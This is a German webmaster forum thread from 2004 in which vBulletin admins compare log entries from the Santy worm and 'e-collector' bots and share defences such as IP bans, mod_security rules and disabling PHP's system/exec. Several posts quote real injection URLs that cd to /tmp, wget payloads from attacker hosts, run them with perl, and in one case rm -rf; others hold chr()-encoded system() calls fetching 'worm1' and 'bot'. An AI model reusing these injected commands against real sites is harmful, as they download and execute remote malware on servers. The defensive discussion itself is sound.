Halloo. Dies ist mir gerade aufgefallen. Schon seit ein paar Stunden gibt s immer wieder aufrufe mit folgender url

Was bitte ist das? :confused: :confused:
http://halloo.de/t.php?goto=lastpost&t=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt;wget%20www.visualcoders.net/worm1.txt;wget%20www.visualcoders.net/php.txt;wget%20www.visualcoders.net/ownz.txt;wget%20www.visualcoders.net/zon Das steht auf der "Wer ist online"-Seite:

IP: 66.98.192.84
Host: hera.jtfhosting.net
User-Agent: LWP::Simple/5.803

Ahja. t.php ist bei mir showthread.php ;)

Derzeit ist wohl davon auszugehen, dass es sich hierbei um den sog. "Santy-Wurm" handelt, der PHP-Skripte attackiert. (Du wärst dann allerdings wohl einer der ersten vB3-User, die von diesem Wurm betroffen wären. Läuft auf Deinem Server zufällig noch ein phpBB?)

Hier mal der letzte heise.de-Artikel: Klick (http://www.heise.de/newsticker/meldung/54623)

mfg

btw - ich habe gerade mal bei mir nachgeschaut. Auch hier ist eine Suchmaschine mit dem Namen "e-collector" aktiv, die sich überwiegend auf die "Druckversionen" zu fixieren scheint:

69.44.60.171
LWP::Simple/5.803

64.106.233.70
LWP::Simple/5.65

203.194.204.253
lwp-trivial/1.41


Wollen wir mal hoffen, dass das vB3 sicher bleibt.

EDIT: das hiesge vb-germany Board wird auch gerade von einem "e-collector"-Schwarm heimgesucht.

EDIT2: sehe gerade, dass das Thema "e-collector" schon angeschrieben wurde: Klick (http://www.vbulletin-germany.com/forum/showthread.php?t=14774)

mfg

Bei mir ist er auch unterwegs :eek:

216.251.35.164
LWP::Simple/5.53

Könnte man ihn nicht per robots.txt ausschliessen ?

Edit: naklar steht doch in den obigen Links - auf robots.txt bezogen !!!

E-Collector scheint sich aber nicht wirklich um unsere robots.txt zu scheren.

Ich hab schon wieder einen, aber diesmal nen anderen Link: :eek:

http://halloo.de/t.php?goto=http://midomain.false.ca/~pillar/.zk/php.gif?&cmd=cd%20/tmp;wget%20midomain.false.ca/~pillar/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%20midomain.f alse.ca/~pillar/.zk/sess_189f0f0889555397a4de5 Ne ein phpbb hab ich nicht. Sowas kommt mir auch nicht auf den Space. Und ich hab alle PHP-Dateien mit den Rechten 0644. Hab ich erst gestern überprüft. ;)

und gleich noch einen :

http://halloo.de/t.php?goto=newpost&t=349/./s.php?amp;do=finduser&u=http://midomain.false.ca/~pillar/.zk/php.gif?&cmd=cd%20/tmp;wget%20midomain.false.ca/~pillar/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%20midomain.f al http://halloo.de/t.php?goto=newpost&t=349/./k.php?amp;do=sendtofriend&t=http://midomain.false.ca/~pillar/.zk/php.gif?&cmd=cd%20/tmp;wget%20midomain.false.ca/~pillar/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%20midomain Habe jetzt die IPs vom e-collector gesperrt:

Diese habe ich bisher:
64.246.28.101
62.141.48.42
62.2.78.25
81.169.157.115
216.251.35.158
66.98.154.77
216.251.35.159

:eek: Tausend dank für den Hinweis. Ich hab noch ein jahrealtes unsicheres zweit-board, das kein vb ist. Bitte weitere verdächtige Aufrufe auch posten, damit ich mod_security geeignet einrichten kann.

http://halloo.de/t.php?goto=newpost&t=337/./misc.php?amp;do=http://midomain.false.ca/~pillar/.zk/php.gif?&cmd=cd%20/tmp;wget%20midomain.false.ca/~pillar/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%20midomain.f alse.ca/~pilla und gleich noch einer :mad:

Per IP Sperren im ACP wäre ja sicherlich eine Lösung, aber dabei muss
man ja stehts darauf lauern was bzw. welche IP der E-Collector benutzt.

Wäre es nicht eine Variable den User-Agent mit in die Option
ACP (Gesperrte IP-Adressen) mit zu übernehmen ?

So bräuchte man nur den jeweiligen User-Agenten einzutragen !?!

Ein paar Gedanken:
Der obige Angriff funktioniert nur, wenn der Inhalt der entsprechenden Variablen als shell-Befehl eingesezt wird. In php sind dazu die in der php.ini sperrbaren Funktionen "exec" und "system" sowie der back-tick-operator nötig. Die Gefahr sollte also begrenzt sein.

Trotz allem: Die zusätzliche Serverlast + Trafficaufkommen stören -- da anscheinend wirklich jede Variable ausgetestet wird, kommt da eine Menge zusammen. Deshalb der Rat: Wenn dein Apache mod_security benutzt, kannst du Abfragen, die "wget" enthalten, sperren.

Und ich hab alle PHP-Dateien mit den Rechten 0644. Hab ich erst gestern überprüft. ;)
Wie genau bist Du denn vorgegangen? Hast Du eine htaccess (wie von vB empfohlen) mit folgendem Inhalt angelegt?

cd /pfad/zu/ihrem/vbulletin
chmod -R 644 *.php
chmod -R 644 *.htm
chmod -R 644 *.asp
chmod -R 644 *.shtm
chmod -R 644 *.jsp
chmod -R 644 *.phtm

mfg

Wie genau bist Du denn vorgegangen? Hast Du eine htaccess (wie von vB empfohlen) mit folgendem Inhalt angelegt?

cd /pfad/zu/ihrem/vbulletin
chmod -R 644 *.php
chmod -R 644 *.htm
chmod -R 644 *.asp
chmod -R 644 *.shtm
chmod -R 644 *.jsp
chmod -R 644 *.phtm

mfg
Also das sollte nicht etwa in eine .htaccess-Datei, sondern in der shell nach einem ssh-login eingegeben werden. Allerdings gilt hier die Anmerkung, dass (trotz des Parameters -R !) hiermit nur die Dateirechte des Hauptverzeichnisses deines vBs geändert werden. Und natürlich nützt das auch nur dann etwas, wenn die Dateien nicht dem User des Apache gehören (was wohl nur deshalb nicht erwähnt wurde, weil es als selbstverständlich gilt).

Also mich erinnert der e-collector an den jeteye-- der war auch lästig wie einen Sch*****fliege-- den hab ich via .htaccess ausgesperrt

Habe hier nochwas zum Thema Santy-Wurm hackt php-Boards (http://www.html-world.de/news.php?show=490)

Habe hier nochwas zum Thema Santy-Wurm hackt php-Boards (http://www.html-world.de/news.php?show=490)


solangsam kann mans nicht mehr lesen gibt es nicht genug andere möglichkeiten sich zu beschäftigen als so nen misst zu basteln echt ätzend

Wie genau bist Du denn vorgegangen? Hast Du eine htaccess (wie von vB empfohlen) mit folgendem Inhalt angelegt?mfg Ich habe mich via SSH eingeloggt, und mit Rechter Maustaste auf den Ordner die Eigenschaft "chmod" augewählt und dort dann nur nachgeschaut, ob die Rechte für die jeweiligen Dateitypen stimmen. Ich muss dazu sagen, das ich die Ordner auf dem Linux-Server im Windows.Stil angezeigt bekomme. Sie Pic im Anhang ;)
Ps ich nutze WinSCP in Verbindung mit Putty. Putty benutze ich aber äusserst selten. Und ein Passwort gebe ich auch nicth mehr ein, weder in WinSCP noch in Putty, da ich mir einen Private Key angelegt habe. :D

http://www.schlittermann.de/ssh

http://vbg.halloo.de/89868.jpg

habs einfach mit nem ftp client gemacht

FTP ist aber unsicher. SSH kannste mit Blowfish verschlüsseln.

FTP ist aber unsicher. SSH kannste mit Blowfish verschlüsseln.


hm gut habe ja ssh zugang, gibts dafür ne kleine anleitung wie man das nutzen kann bzw was man alles machen kann

kommt drauf an mit welchem Client? Mit WinSCP gehts so:

Erstelle eine neue verbindung, trage die LoginDaten ein und klicke dann in der leiste auf "SSH" Dort eine Verschlüssungsart auswählen und speichern. Dann einloggen.

Hier ist das auch ausführlich erklärt. leider gibts das nur in english
http://winscp.sourceforge.net/eng/docs/

http://vbg.halloo.de/89878.jpg

danke dir schaue ich mir dann gleich mal an

Das komische. der ist 2x da. Einmal als Spider und 1x as Gast :confused:

http://vbg.halloo.de/89880.jpg

Hattest du vorher schon das hier probiert? http://www.vbulletin-germany.com/forum/showpost.php?p=89834&postcount=4

Oh danke. Gar nicht gesehen. Hatte aber mittlerweile ne Menge IPs zusammen.

61.172.246.33
62.2.78.25
62.141.48.42
64.191.56.190
64.246.28.101
65.75.171.210
65.98.67.202
66.33.214.26
66.79.176.30
66.98.148.11
66.98.154.77
66.98.246.62
67.15.14.12
69.50.214.130
70.85.24.196
80.84.249.181
81.27.32.133
81.169.157.115
203.208.251.133
205.209.130.160
205.209.174.140
207.44.180.49
209.128.84.190
213.232.85.35
216.251.35.158
216.251.35.159

zur Zeit ist ein Gast in meinem Forum, der diesen Link benutzt hat: :confused:

http://halloo.de/archive/index.php/t-280.html&highlight=%2527%252esystem(chr(99)%252echr(100)%252echr(32)%252echr(47)%252echr(118)%252echr(97)%252 echr(114)%252echr(47)%252echr(116)%252echr(109)%252echr(112)%252echr(59)%252echr(119)%252echr(103)%2 52echr(101)%252echr(116)%

Das wird wohl die nächste Generation sein.
Hast du den User-Agent parat?

Edit: Wer die Funktionen system und exec in der php.ini noch nicht gesperrt hat, sollte sich dazu ermuntert fühlen (safe mode reicht dafür wohl auch). ;)

Oh wie gut das ich seit Anfang an im Safemode bin. :D

Gast Betrachtet das Archiv 2
69.44.61.120
lwp-trivial/1.41

69.44.61.120 lwp-trivial/1.41

hast du die letzten Tage deine Seite irgendwo angemeldet, bei suchmaschienen oder linklisten??
Den hab ich auch zwischendurch drauf und der geht auch wieder...

nicht immer gleich Panik..

Panik hab ich auch keine. Zur Not mach ich .htaccess mit .htpasswd rein. Wenns nervt. Tuts aber noch nicht....

Nur ich habe mich entschieden, auffälliges gleich zu posten. Denn das ich nicht der einzzige bin, sieht man ja. Nur die meisten sehen das nicht, weil das immer nur im Alt-TExt über den Fragezeichen zu sehen ist. Ich habe das bei mir so eingestellt, das der alt-text immer hinterm Fragezeichen zu sehen ist. (sehe nur ich als admin.) :p

So siehst dann aus.
http://vbg.halloo.de/90026.jpg

wer es auch machen möchte. Öffne das template whosonlinebit und suche: <if condition="$show['reallocation']"><img src="$stylevar[imgdir_misc]/question_icon.gif" alt="$userinfo[location]" /></if> ersetze diesen Teil mit <if condition="$show['reallocation']"><img src="$stylevar[imgdir_misc]/question_icon.gif" alt="$userinfo[location]" /><if condition="is_member_of($bbuserinfo,6)"><span class="smallfont">$userinfo[location]</span></if></if> Der User Agent von dem im Bild ist: 217.172.172.190 - lwp-trivial/1.36

argon190.it-sauer.de deine 217.172.172.190

Und der nächste mit einer neuen IP...

193.226.140.217 - rodedicated05.webhost-in-romania.com
lwp-trivial/1.41

archive/index.php/t-38.html&highlight=%2527%252esystem(chr(99)%252echr(100)%252echr(32)%252echr(47)%252echr(118)%252echr(97)%252 echr(114)%252echr(47)%252echr(116)%252echr(109)%252echr(112)%252echr(59)%252echr(119)%252echr(103)%2 52echr(101)%252echr(116)%2 195.246.156.14 - microscoop.server.vianetworks.fr
LWP::Simple/5.43
/t.php?p=1401&rush=echo%20_START_%3B%20cd%20/tmp;%20rm%20-rf%20*;wget%2069.72.226.122/~demo/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%2069.72.226. 122/~demo/.zk/sess_189f0f0889555397a4de5485dd611116;perl%20

Und ich hab schon wieder was entdeckt. Diesmal in den Apache-Logs

[Wed Dec 29 16:19:46 2004] [error] [client 80.58.51.235] File does not exist: /home/hallooforum.de/www/t.php?t=282&prev=/search?q=suma++mail&start=700&num=100&hl=en&lr=&sa=N Wird auf der Wer ist online Seite nicht angezeigt. :confused:

Dabei st miir auch aufgefallen, das die anderen urls auch Fehler sind. Warum die dann aber auf der WIO-Seite auftauchen und dieser nicht?

[Tue Dec 28 13:09:28 2004] [error] [client 69.44.61.120] (36)File name too long: access to /t-280.html&highlight=%27%2esystem(chr(99)%2echr(100)%2echr(32)%2echr(47)%2echr(118)%2echr(97)%2echr(114)%2echr( 47)%2echr(116)%2echr(109)%2echr(112)%2echr(59)%2echr(119)%2echr(103)%2echr(101)%2echr(116)%2echr(32) %2echr(104)%2echr(116)%2echr(116)%2echr(112)%2echr(58)%2echr(47)%2echr(47)%2echr(119)%2echr(119)%2ec hr(119)%2echr(46)%2echr(53)%2echr(119)%2echr(107)%2echr(46)%2echr(99)%2echr(111)%2echr(109)%2echr(47 )%2echr(119)%2echr(111)%2echr(114)%2echr(109)%2echr(49)%2echr(59)%2echr(112)%2echr(101)%2echr(114)%2 echr(108)%2echr(32)%2echr(119)%2echr(111)%2echr(114)%2echr(109)%2echr(49)%2echr(59)%2echr(119)%2echr (103)%2echr(101)%2echr(116)%2echr(32)%2echr(104)%2echr(116)%2echr(116)%2echr(112)%2echr(58)%2echr(47 )%2echr(47)%2echr(119)%2echr(119)%2echr(119)%2echr(46)%2echr(53)%2echr(119)%2echr(107)%2echr(46)%2ec hr(99)%2echr(111)%2echr(109)%2echr(47)%2echr(98)%2echr(111)%2echr(116)%2echr(59)%2echr(112)%2echr(10 1)%2echr(114)%2echr(108)%2echr(32)%2echr(98)%2echr(111)%2echr(116))%2e%27 failed